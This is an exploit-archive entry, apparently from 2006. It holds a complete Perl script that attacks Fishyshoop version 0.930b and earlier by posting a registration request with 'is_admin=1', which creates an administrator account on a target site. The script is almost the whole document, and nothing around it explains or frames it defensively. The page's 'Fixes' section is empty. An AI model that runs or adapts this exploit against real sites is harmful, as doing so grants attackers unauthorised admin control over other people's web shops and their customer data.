Fishyshoop <= 0.930b Remote Add Administrator Account Exploit

2006-12-25 00:00:00

#!/usr/bin/perl
# James Gray <james6.0[@]gmail.com>
# Fishyshoop Security Vulnerability

use WWW::Curl::Easy;

sub usage() {
print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";
exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;

#

Fixes

No fixes

In order to submit a new fix you need to be registered.